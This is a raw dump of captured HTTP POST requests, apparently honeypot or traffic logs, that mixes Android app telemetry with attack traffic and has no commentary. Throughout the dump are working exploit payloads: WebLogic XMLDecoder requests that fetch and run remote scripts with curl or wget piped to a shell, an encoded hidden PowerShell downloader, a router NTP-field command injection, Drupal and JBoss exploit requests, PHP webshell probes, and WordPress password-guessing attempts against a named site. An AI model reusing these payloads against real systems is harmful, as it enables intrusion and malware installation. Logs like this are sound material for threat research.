Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
34887ba2ef099f320cce713f2b4d523b
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE--
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=172&pwd=asdf!@#$
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172111
POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å™≈˜[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
axa=die((string)(111111111*9));
POST http://behacdn.ksmobile.net/ecfl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 49
1Ñö «ÍÕ`i'c
KlE^Sz]#[@^zZr^kZ&=0OoBcékµ]IJ
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: x.x.x.x:8080
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
form_id=user_register_form&_drupal_ajax=1&mail%5Ba%5D%5B%23post_render%5D%5B%5D=passthru&mail%5Ba%5D%5B%23type%5D=markup&mail%5Ba%5D%5B%23markup%5D=echo+ponies
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 36
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue44444
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=admin&pwd=admin123456789
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=888888888
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 437
n=134255745806775&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyNC4yMTAuOTgcGAAYABgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZLBgTYXBwLmNoYXQueGlhb21pLm5ldBUAFQIWlLECFQAbAAAYEjExMS4yMDYuMjAwLjI6NTIyMhUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494586103072&s=E6F1A827C8D2E358D8E3EF6A22788153
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 456
Cache-Control: no-cache
RKZeydqeZ91Pf94kJtD5EhVPQlC9D7X6hgpJLrps3yWaRPR58jRuZ/kIxDGYI3/Wj5tJSmMzV/yfEl47V40E4mNM362qMoL7UPYEFdLMTcDQMaplt9GToXo5Bx60niHiRiV2RZNWESO25wv4t3qSIsUAJ6m142C0+Patn3a1KvQzdKFvFUKC0WjlBz4w7aFoF7idJiJP0IOCaet6MjCIyx40txp16l7zCqx5Q5qO11HISwNLPdKxL5l71pwdl68xo7mVrddYXi7cqqYpV9r2VBwvJ+qfsJCjOK5E4r0feb9ibwF2tUYC1Ym88wTeqdmCf3GQFBVIGCI2DLs4jHS8IeFoor/cI/FFWlE0nXIQGPEVFxhGGkp3HkFK8hx/OMOZMs2bdfb6xk7CjdrfiO6bzS6R+LgZGmtTxhadJEBKLXQv5YkMstEcIn10auXFDC2oH5B+Kw==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cmdts.ksmobile.com/c/ HTTP/1.1
Content-Length: 132
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cmdts.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Ñ £†Ì MÆ˛
¡Ã◊·Êr4ŒwæÎÎÎΩ∫È∞∏º∞∫πºÓCÂY–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏CÂY€¯‰È˚‡·Êԅθ·˛·¸Ò
POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 576
@˚À€ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^ <∞êΩúqj–˙+%kZ&=:OcøúèïCh*8k'2<0OeBoÀdEhB*:kZ&I)NoAipf3F*9k[&=0–oBcs`Bd‹™=k[&=0OoBcpjAbC&ìZ&<0OoBcpjBh@ 8g3¸50NoCcpj]b+;aZ*πÍGoCcrjBhe 8kY,=<…µJcqjChC*≤ñ&>:Ocƒ"wjChB*8kπ‰90LeBo˜+EhB*8kZ&=0OoAipf )D*9kZ&=0OoBcs`Bd…k?k[&=0OoBcpjAbC&2Ó^&<0MoBcojBh@ 8g•Ü:0NoBcpjBhC*;aZ*üØGoCcpjBhC*8kY,=<∂EcqjBhC*8kZ&>:Ocø¸wjChC*8kZ&=0LeBoéıEhB*8kZ&=0OoAipf@»D*9kZ&=0OoBcs`Bd… 8k[&:0OoI™pjAbC&ˇ¢Z&<0OoBcpjBh@ 8gr=0NoAcpj11á(;aZ*iOoCc2jBh0á7kY,=<P'DcqjChC*'kZ&>:OcE6pjChC*8kZ&=0LeBoj JhB*:kZ&ù$OoAipf≥G*9kZ&=0OoBcs`BdΩ’«î[&Ø¢'P_cpjBbC
POST /your/killing/me/smalls.jpg HTTP/1.1
Host: x.x.x.x
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Length: 9
Accept-Language: en-us
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=OZFH566OZ
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /invoker/JMXInvokerServlet HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ContentType:: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 687
¨Ìsr)org.jboss.invocation.MarshalledInvocationˆï'A>§æ xppwóQM›‘*BØsrjava.lang.Integer‚†§˜Åá8Ivaluexrjava.lang.Numberܨï î‡ãxp&ïæ
sr$org.jboss.invocation.MarshalledValueÍÇ—ÙJ–ô xpwâŨÌur[Ljava.lang.Object;êŒXüs)lxpsrjavax.management.ObjectNameßÎmœxptjboss.system:type=ServerInfoxtOSName{á†˚xwsr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘Iordinalxpsr$org.jboss.invocation.MarshalledValueÍÇ—ÙJ–ô xpw
¨Ìp˚Wß™xwsr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘Iordinalxpsr#org.jboss.invocation.InvocationTypeYß:•+|øIordinalxpsr"org.jboss.invocation.InvocationKey∏˚rÑ◊ìÖ˘Iordinalxp
px
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
381935
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
2882ac56c9a0b04fd2d2baaae7e79c59
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--wWRarNSbwU4HV4EVH3AKFUeSOTawGw--
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
438644
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
e8835890b4626af1827f1ce7a7181afb
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--BDO0al7Ai886DANyvi2IqRHCt_lsVB7upNfFU--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache
QKxWwY/AMeI5XEOrqwqysgVMewA6N/3rzcQLa3yXdd3uxPQtOfHZkGQYoxGW8FmUUfT3ecSkJaloiA/vsdyqy540VtIBhEQ1vNyaBXVS97aj1xA/vZQ+0upqVJj5pr8736e+NykMYgGUlWvgPaK/d4RMt3pHBXXeoAqZdIttx1YP7amcnky2DgQg/y7RjM+Wep+ZSW0dekp74l6ucKGV7Td6t329nnyz89D3ik+T8hjzWwbymCt19pjb5oUmUDPaKExpEsw4EQX10zNqveQ42HRWleHnnvawrVbT7sJuwLV1uQBXQkjj1ONbA35W7/oG6NPHlDqFeC5UKYjoKLvbfgIAAmnGZMfttTr21z9OsIlDFyywEmgkO7XzgC/ZaxIesSK8As0PTQ==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=17171717
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Upgrade-Insecure-Requests: 1
Content-Length: 1133
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="4">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget -O - -q http://3389.space/lx/logo.jpg|bash</string>
</void>
<void index="3">
<string>curl http://3389.space/lx/logo.jpg|bash</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=-D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
154831
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
df4ddeed67dbc6a04c1cac21c3aaa598
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
---D-bGJadyY0HYB1j0NTfvZmt0CwT01fl8--
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://check.proxyradar.com/azenv.php?auth=149552563701&a=PSCMN&i=1082784101&p=80 HTTP/1.1
